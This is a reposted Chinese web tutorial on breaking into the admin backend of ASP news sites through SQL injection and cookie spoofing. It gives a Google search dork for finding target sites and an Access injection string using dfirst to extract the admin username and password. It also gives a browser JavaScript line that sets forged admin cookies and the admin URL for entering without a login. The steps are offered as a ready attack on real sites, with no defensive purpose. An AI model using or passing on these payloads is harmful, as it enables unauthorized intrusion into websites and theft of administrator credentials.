温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

COOKIES欺骗通杀漏洞进后台

发布时间:2020-07-31 16:38:59 来源:网络 阅读:1487 作者:许肖 栏目:安全技术

在谷歌里搜索:inurl:news_more.asp?lm2=

搜索到如下站点:http://www.*********/news_more.asp?lm2=169

1.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”

2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内,修改保存。


3.

COOKIES欺骗通杀漏洞进后台




alert(document.cookie="adminuser=" + escape("1"));alert(document.cookie="adminpass=" + escape("2")); 代码拷贝进浏览器,回车;(注:标红1处填上图中1内容,2处填上图中2内容)

COOKIES欺骗通杀漏洞进后台点击确定。

COOKIES欺骗通杀漏洞进后台点击确定。

5.将地址  http://www.*********/admin/admin_news_pl_view.asp?id=1  改成  http://www.*********/admin/admin_index.asp 回车,即可不用登录直接进入后台了。如图,

COOKIES欺骗通杀漏洞进后台


向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI